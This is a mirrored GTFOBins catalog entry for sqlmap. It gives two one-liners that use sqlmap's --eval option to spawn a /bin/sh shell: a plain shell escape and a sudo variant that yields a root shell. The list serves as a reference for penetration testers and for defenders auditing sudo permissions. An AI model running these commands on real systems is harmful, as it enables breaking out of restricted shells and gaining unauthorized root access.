1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/sqlmap.md

9 lines
286 B
Markdown
Raw Permalink Normal View History

---
description: This allows to execute [`python`](/gtfobins/python/) code, other functions may apply.
functions:
shell:
- code: sqlmap -u 127.0.0.1 --eval="import os; os.system('/bin/sh')"
sudo:
- code: sudo sqlmap -u 127.0.0.1 --eval="import os; os.system('/bin/sh')"
---